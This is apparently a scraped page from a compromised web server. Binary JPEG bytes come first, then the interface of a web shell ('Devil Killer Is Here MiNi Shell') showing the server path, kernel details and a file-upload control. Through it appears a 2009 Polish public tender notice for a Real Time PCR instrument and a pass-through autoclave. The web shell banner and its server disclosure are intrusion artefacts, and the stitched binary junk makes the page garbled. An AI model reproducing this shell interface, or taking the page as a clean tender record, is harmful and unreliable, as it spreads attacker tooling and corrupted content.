JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090911/315810-N-2009.html

<p class="kh_header"><b>Olsztyn: Postępowanie o udzielenie zamówienia publicznego prowadzone
w trybie przetargu nieograniczonego o wartości szacunkowej poniżej kwoty określonej w przepisach wydanych na podstawie art. 11 ust.8 ustawy Prawo zamówień publicznych
(Dz.U. z 2007 r. Nr 223, poz. 1655 ze zmianami )
na dostawę aparatów:
Real Time PCR oraz autoklawu przelotowego</b><br>
<b>Numer ogłoszenia: 315810 - 2009; data zamieszczenia: 11.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzka Stacja Sanitarno-Epidemiologiczna , ul. Żołnierska 16/201, 10-561 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5279500, faks 089 5279788.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wsse.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Inspekcja Sanitarna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego prowadzone
w trybie przetargu nieograniczonego o wartości szacunkowej poniżej kwoty określonej w przepisach wydanych na podstawie art. 11 ust.8 ustawy Prawo zamówień publicznych
(Dz.U. z 2007 r. Nr 223, poz. 1655 ze zmianami )
na dostawę aparatów:
Real Time PCR oraz autoklawu przelotowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie I: LBEK - dostawa Aparatu Real Time PCR
Przedmiot zamówienia obejmuje:
-dostawę, instalację i uruchomienie w terminie max. 4 tygodnie od daty podpisania umowy aparatu Real Time PCR wraz z komputerem do sterowania aparatem, kompatybilną drukarką;
-oprogramowanie aparatu i bazą danych z opcją automatycznego zapisywania informacji o wszystkich zmianach w plikach z otrzymanymi wynikami dokonywanych przez użytkowników aparatu;
-przeszkolenie pracowników Zamawiającego w jego siedzibie w zakresie obsługi i eksploatacji urządzenia objętego przedmiotem zamówienia;
-świadczenie usług serwisowych w okresie gwarancji i rękojmi. 

Oferowane urządzenie musi być fabrycznie nowe, wolne od wad i  aktualnie produkowane na rynku. 
Urządzenie musi być kompletne, gotowe do pracy bez konieczności dodatkowych zakupów. 

Wykonawca zobowiązany jest do dostarczenia własnym transportem i na własny koszt do wskazanego miejsca dostawy oraz rozstawienia, skonfigurowania i uruchomienia przedmiotu zamówienia, a także przeprowadzenia szkolenia pracowników w siedzibie Zamawiającego z zakresu obsługi i oprogramowania przedmiotu zamówienia.
Ilość osób - 15 , 3 dni szkolenia po 7-8 godzin. 

Wymagane parametry:
-urządzenie umożliwiające przeprowadzenie ilościowej reakcji PCR w czasie rzeczywistym z użyciem barwników fluorescencyjnych
-jednoczesna amplifikacja 96 prób z gwarancją możliwości zwiększenia ilości jednocześnie wykonywanych prób   do 384 po dokupieniu bloku. Zmiana bloku z 96 na 384 dołkowy nie może wpływać na zmianę parametrów technicznych urządzenia takich jak ilość kanałów wzbudzenia światła i ilość kanałów detekcji fluorescencji.
-archiwizacja amplifikowanego materiału w płytkach 96-384 dołkowych, w których dokonywana jest reakcja PCR
-zakres objętości mieszaniny reakcyjnej, w której można przeprowadzić reakcję PCR: 10 - 100?l
-prędkość nagrzewania bloku  nie więcej niż 4,5°C na sek
-prędkość chłodzenia bloku nie więcej niż 2°C na sek
-system detekcyjny - kamera CCD wysokiej czułości-
-5 kanałów wzbudzenia światła
-6 kanałów detekcji fluorescencji
-Element wzbudzający - lampa ksenonowa do samodzielnej wymiany przez użytkownika, bez potrzeby wzywania serwisu firmy do laboratorium z monitoringiem czasu pracy
-Możliwość samodzielnej wymiany źródła światła (żarówka) przez użytkownika, bez potrzeby wzywania serwisu firmy do laboratorium
-System otwarty, umożliwiający analizę kwasów nukleinowych przy pomocy różnych barwników i sond molekularnych:
SYBR Green I	Barwnik interkalujący typu LC Green  do analizy HRM (High Resolution Melting)
Sonda hydrolizująca typu TaqManR
Sonda Hybrydyzująca typu HybProbeR
Sonda Simple ProbeR

.Oprogramowanie urządzenia umożliwia wykonanie:
	Pomiar ilości kopii DNA w badanej próbie
	Pomiar poziomu ekspresji genu badanego w stosunku do genu referencyjnego
	Analizy genotypowania - analiza genotypu na podstawie temperatury topnienia produktu
	Analizy Gene Scanning - High Resolution Melting służąca do analizy mutacji (w tym SNP) przy        pomocy specjalnego barwnika interkalującego typu LC Green lub podobny
	Analizy end-point mutation
	Porównania płytek z wynikami dla wszystkich dostępnych aplikacji z uzyskaniem wyniku w oprogramowaniu typu MS Excel
Wykonanie analizy Gene Scanning - High Resolution Melting bez konieczności wprowadzania standardów o znanym genotypie; poszczególne krzywe mogą być łączone w grupy automatycznie, na podstawie swojego podobieństwa
Obserwowanie przeprowadzanej reakcji PCR na bieżąco podczas jej trwania (online)
Oprogramowanie aparatu i baza danych z opcją automatycznego zapisywania informacji o wszystkich zmianach w plikach z otrzymanymi wynikami dokonywanych przez użytkowników aparatu (tzw. traceable database)
Tworzenie plików z podsumowaniem reakcji PCR (m.in. parametry reakcji PCR, wyniki, wykresy) w formacie .pdf
instrukcja pełnej wersji w języku polskim oraz w języku angielskim
pakiet startowy odczynników na minimum 100 reakcji:
	- izolacja RNA i DNA
	- odczynniki do detekcji wirusa grypy AH1N1 typu One step z kontrolą wewnętrzną i kontrolą dodatnią.

wyposażenie dodatkowe do aparatu ww:
komputer do sterowania aparatem i analizy danych polecany przez producenta aparatu
drukarka laserowa kolorowa kompatybilna z zaoferowanym komputerem wraz z zestawem tonerów. 
monitor LCD 17 cali

Intel Pentium Dual Core E2160 Processor 1.8 GHz
RAM 2 GB
2 x Hard Disk 160 GB
NIC Broadcom NetXtreme Gigabit LAN
16x/48 CD-/DVD+/-RW LightScribe Driver
6 x USB 2.0
2 x RJ-45 LAN
2 Serial- + 1 Parallel Port
2 PS/2 (Mouse + Keyboard)
1 VGA analog Video
2 Audio (in/out)
WIN XP Service Pack 2
Windows XP hot fixes up to MS08-078 (17.12.2008)
MS .net Framework Version 2.1.3.1
Symantec pcAnywhere Host Version 12.1.0
Roxio Easy Media Creator Version 10.1.1 Silver
Adobe Reader Version 9
Adobe Flash Player 10.0.12.32


Dodatkowe usługi:
Producent aparatu  musi posiadać jednocześnie w swojej ofercie katalogowej zestawy odczynników (SYBR Green I, odczynnik interkalujący typu LC Green, sondy) dostosowane i zoptymalizowane do pracy na oferowanym aparacie
Producent aparatu musi posiadać w swojej ofercie katalogowej gotowe zestawy - biblioteki sond molekularnych umożliwiających analizę cDNA - DNA człowieka


Dostawa, instalacja i uruchomienie  aparatu Real Time PCR nastąpi w terminie max. 4 tygodnie od daty podpisania umowy do siedziby Zamawiającego: Olsztyn, ul. Żołnierska 16, Laboratorium Badań Epidemiologiczno-Klinicznych, IX piętro.

Płatność nastąpi do 30 dni po wystawieniu faktury.
Faktura może zostać wystawiona po dostarczeniu do Zamawiającego przedmiotu zamówienia i podpisaniu protokołu zdawczo-odbiorczego (załącznik nr 4).
Faktura musi zawierać symbol PKWiU.





Zadanie II : LBEK - dostawa autoklawu przelotowego (1 sztuka)

Przedmiot zamówienia obejmuje:
dostawę, instalację i uruchomienie w terminie max. 8 tygodni od daty podpisania umowy autoklawu przelotowego;
przeszkolenie 15 pracowników siedzibie Zamawiającego w zakresie obsługi i eksploatacji urządzenia objętego przedmiotem zamówienia, 2 dni szkolenia po 7-8 godzin;
świadczenie usług serwisowych w okresie gwarancji i rękojmi. 

Oferowane urządzenie musi być fabrycznie nowe, wolne od wad i  aktualnie produkowane na rynku. 
Urządzenie musi być kompletne, gotowe do pracy bez konieczności dodatkowych zakupów. 

Wykonawca zobowiązany jest do dostarczenia własnym transportem i na własny koszt do wskazanego miejsca dostawy oraz rozstawienia, skonfigurowania i uruchomienia przedmiotu zamówienia, a także przeprowadzenia szkolenia pracowników w siedzibie Zamawiającego z zakresu obsługi i oprogramowania przedmiotu zamówienia.
 


Lp.	Parametry  wymagany
1	Poziomy, przelotowy  autoklaw laboratoryjny, pojemność użytkowa 150 l, dwudrzwiowy, wymiary komory: O 500mm-520mm x głębokość 750mm-770mm, waga do 330 kg, wymiary zewnętrzne max: szer. 1020mm-1040mm x wys. 1670mm-1690mm x głęb. 1160mm-1180mm
Całkowicie automatyczny sterownik mikroprocesorowy kontrolujący wszystkie funkcje autoklawu

2	Automatyczna blokada ciśnieniowa i termiczna drzwi (system niezależny od przerw w zasilaniu elektrycznym)
3	Inteligentny system blokowania drzwi przeciwległych: po otwarciu drzwi po stronie brudnej uniemożliwia otwarcie drzwi po stronie czystej do momentu zakończenia prawidłowego cyklu sterylizacji
4	Komunikat na wyświetlaczu sygnalizujący otwarcie drzwi komory po stronie przeciwnej
5	Elastyczna sonda temperaturowa umieszczana w punkcie (naczyniu referencyjnym z płynem) lub w komorze - do kontroli i sterowania procesem sterylizacji 
6	14 standardowych programów , w tym program czyszczący , test szczelności i test Bowie-Dicka
7	Zakres nastawy temperatury sterylizacji 60-140°C, czas sterylizacji 1-300minut, ciśnienie pary do 4 bar , bieżąca temperatura i ciśnienie w komorze autoklawu podczas trwania procesu widoczne na wyświetlaczu
8	Całkowite oddzielenie wytwornicy pary od komory sterylizacyjnej - pełna gotowość do podawania pary do autoklawu przez cały czas pracy urządzenia
9	Komora wyposażona w port walidacyjny do wprowadzania sond kontrolnych
10	Obudowa wykonana ze stali nierdzewnej (kwasoodpornej)AISI 304, komora ciśnieniowa i pokrywa komory  - ze stali tytanowej AISI 316 Ti
11	Schładzanie kondensatu do 70oC
12	Autoklaw musi posiadać:
a) drukarka do rejestracji temperatury, ciśnienia i czasu, faz procesu oraz komunikatów
b) system próżniowy, z pompą próżniową bezolejową (uszczelnianą pierścieniem wodnym) do odpowietrzania wsadu metodą próżni frakcjonowanej (min. 5 impulsów próżnia/ciśnienie) oraz do suszenia próżniowego
c) system dekontaminacji powietrza opuszczającego komorę w fazie odpowietrzania, nagrzewania i sterylizacji; wymagany przy pracy z materiałem zakaźnym; zawierający filtr 0,2?m, wyjaławiany każdorazowo w fazie sterylizacji; wyposażony we własną sondę temperaturową Pt100, kontrolującą prawidłowy przebieg sterylizacji
13	Wymagana walidacja autoklawu w punktach i temperaturach dostosowanych do materiałów i wymogów użytkownika (PQ, 3-krotne pomiary w pustej komorze i 3-krotne pomiary procesu utylizacji odpadów)
14	Dodatkowe wyposażenie:
- przepływowy demineralizator ze złożem wymienników jonowych do wody procesowej
- konduktometr
- zmiękczacz wody do chłodzenia i pompy próżniowej
15	Monitorowanie procesów sterylizacji
16	Instrukcja obsługi w języku polskim
17	Certyfikat CE dołączony do oferty
18	Menu w języku polskim


Dostawa, instalacja i uruchomienie  autoklawu nastąpi w terminie max. 8 tygodni od daty podpisania umowy do siedziby Zamawiającego: Olsztyn, ul. Żołnierska 16, Laboratorium Badań Epidemiologiczno-Klinicznych, IX piętro.

Płatność nastąpi do 30 dni po wystawieniu faktury.
Faktura może zostać wystawiona po dostarczeniu do Zamawiającego przedmiotu zamówienia i podpisaniu protokołu zdawczo-odbiorczego (załącznik nr 4).
Faktura musi zawierać symbol PKWiU.

Warunki gwarancji dla aparatu Real Time PCR i autoklawu przelotowego:

Wykonawca udzieli minimum 24 miesięcznej gwarancji na przedmiot zamówienia, w tym na wszystkie elementy urządzeń należących do zestawu. Okres gwarancji liczony jest od daty podpisania przez obydwie Strony protokołu zdawczo - odbiorczego (załącznik nr 4). 
Wykonawca zapewni autoryzowany serwis gwarancyjny i pogwarancyjny, z możliwością dokonania napraw i konserwacji w siedzibie Zamawiającego. 
W czasie gwarancji Wykonawca zapewnia nieodpłatnie: obsługę serwisową, dokonuje bezpłatnych przeglądów technicznych urządzenia, wymianę uszkodzonych części i podzespołów na nowe.
Dokument gwarancji dotyczący urządzenia objętego przedmiotem umowy, Wykonawca wyda Zamawiającemu najpóźniej w dniu daty podpisania przez obydwie Strony protokołu zdawczo - odbiorczego. 
Gwarancja udzielona przez Wykonawcę nie wyklucza uprawnień gwarancyjnych Zamawiającego przyznanych przez producenta na podstawie dokumentów gwarancyjnych, jednakże w dokumencie gwarancyjnym o którym mowa wyżej mowa, Wykonawca nie może wyłączyć swojej odpowiedzialności gwarancyjnej w zakresie w jakim dany produkt jest objęty gwarancją producenta.
Zamawiający niezwłocznie powiadomi Wykonawcę o powstałych wadach przedmiotu zamówienia na piśmie, w tym faxem.
Stwierdzone w okresie gwarancji i rękojmi wszelkie wady, usterki lub braki Wykonawca usunie na własny koszt, najpóźniej w terminie max 14 dni licząc od daty ich zgłoszenia.
Wszystkie koszty związane z wykonywaniem napraw gwarancyjnych, w tym koszty demontażu, transportu ponownego montażu po naprawie - obciążają Wykonawcę.
Koszty wymiany części eksploatacyjnych w okresie gwarancji pokrywa Wykonawca. 
Jeżeli w okresie udzielonej przez Wykonawcę gwarancji na dostarczone urządzenie ta sama jego część (moduł) był trzykrotnie naprawiany, a urządzenie będzie wykazywało wady uniemożliwiające jego użytkowanie zgodnie z przeznaczeniem, Zamawiający ma prawo żądać wymiany urządzenia na nowe, identyczne wolne od wad, a Wykonawca ma obowiązek urządzenie dostarczyć.
Jeżeli wskazany przez Wykonawcę serwis nie usunie zgłoszonej pisemnie awarii w ciągu max 14 dni, Zamawiający ma prawo ponownie wezwać go pisemnie i określić termin usunięcia awarii. Jeżeli ujawnione wady nadal nie zostaną usunięte w żądanym terminie, Zamawiający po uprzednim zawiadomieniu Wykonawcy zleci ich usunięcie osobie trzeciej na koszt Wykonawcy.
Jeżeli naprawa spowoduje wyłączenie urządzenia na okres dłuższy niż 1 miesiąc Wykonawca zobowiązuje się dostarczyć urządzenie zastępcze o takich samych parametrach na czas trwania naprawy.
Po okresie gwarancji Wykonawca zapewni świadczenie usług w zakresie napraw serwisowania przedmiotu umowy oraz zapewni możliwość dostaw części i materiałów eksploatacyjnych przez okres co najmniej 10 lat.
W przypadku zaistnienia konieczności naprawy urządzenia poza siedzibą Zamawiającego koszty transportu pokrywa Wykonawca.
Przedłużenie terminu gwarancji o czas, od kiedy urządzenie zostanie wyłączone z użytkowania z powodu usterki technicznej, wad konstrukcyjnych, produkcyjnych lub materiałowych do zakończenia naprawy
Udzielenie 12 miesięcznej gwarancji dla części zainstalowanych w trakcie naprawy;.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.00-6, 33.19.11.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności określonej w przedmiocie zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień tj. muszą przedstawić aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert ;
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wy?konania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia, tj. przedstawią podpisane oświadczenie (zał. nr 2);
3.	znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia, tj. przedstawią podpisane oświadczenie, że znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (zał. nr 2);
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz. U.  z 2008 r. Nr 171, poz. 1058 ze zm.), tj. przedstawią podpisane oświadczenie, że nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Prawo zamówień publicznych (zał. nr 2).
oraz złożyli wszystkie wymagane oświadczenia, dokumenty i formularze wymagane przez Zamawiającego. 

Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na zasadzie : spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty podmiotowe:
W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych należy złożyć: 

-aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
-aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
-oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (załącznik nr 2 do SIWZ),

W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienia pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia należy złożyć:

-oświadczenie Wykonawcy o spełnianiu warunków wskazanych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (załącznik nr 2 do SIWZ);

-wykaz zrealizowanych dostaw (minimum 5) w ciągu 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenie dokumentów potwierdzających, że dostawy te zostały wykonane należycie. (załącznik nr 5 do SIWZ)

W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonania zamówienia należy złożyć: 

-oświadczenie Wykonawcy o spełnianiu warunków wskazanych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (załącznik nr 2 do SIWZ),


Dokumenty przedmiotowe: 
W celu potwierdzenia, że oferowana dostawa odpowiada wymaganiom określonym przez Zamawiającego należy złożyć aktualne:
Dla zadania I:
-karty katalogowe producenta potwierdzające parametry techniczne aparatu Real Time;
-certyfikaty dla aparatu Real Time:
-  ISO 9001:2000
-  EN ISO 9001:2000
-  zgodności EC 
- GMP (good manufacturing practice, certyfikat dobrej praktyki produkcyjnej)

-aktualny katalog firmy w celu potwierdzenia, że Wykonawca posiada w swojej ofercie zestawy: 
- odczynników (SYBR Green I, odczynnik interkalujący typu LC Green, sondy) dostosowane i 
  zoptymalizowane do pracy na oferowanym aparacie
- gotowe zestawy - biblioteki sond molekularnych umożliwiających analizę cDNA -DNA człowieka

Dla zadania II:
-karty katalogowe producenta potwierdzające parametry techniczne autoklawu przelotowego
-certyfikat CE dla autoklawu przelotowego



Dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do reprezentowania Wykonawcy. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów. Poświadczenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu np. wraz z imienną pieczątką osoby poświadczającej kopię dokumentu za zgodność z oryginałem. W przypadku poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę nie wymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo powinno być w oryginale lub kopii poświadczonej notarialnie. 
Dokumenty sporządzone w języku obcym mają być złożone wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wsse.olsztyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzka Stacja Sanitarno-Epidemiologiczna w Olsztynie, ul. Żołnierska 16
pokój 201.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.09.2009 godzina 10:00, miejsce: Wojewódzka Stacja Sanitarno-Epidemiologiczna w Olsztynie, ul. Żołnierska 16
pokój 201.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I: LBEK - dostawa Aparatu Real Time PCR.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
dostawę, instalację i uruchomienie w terminie max. 4 tygodnie od daty podpisania umowy aparatu Real Time PCR wraz z komputerem do sterowania aparatem, kompatybilną drukarką;
oprogramowanie aparatu i bazą danych z opcją automatycznego zapisywania informacji o wszystkich zmianach w plikach z otrzymanymi wynikami dokonywanych przez użytkowników aparatu;
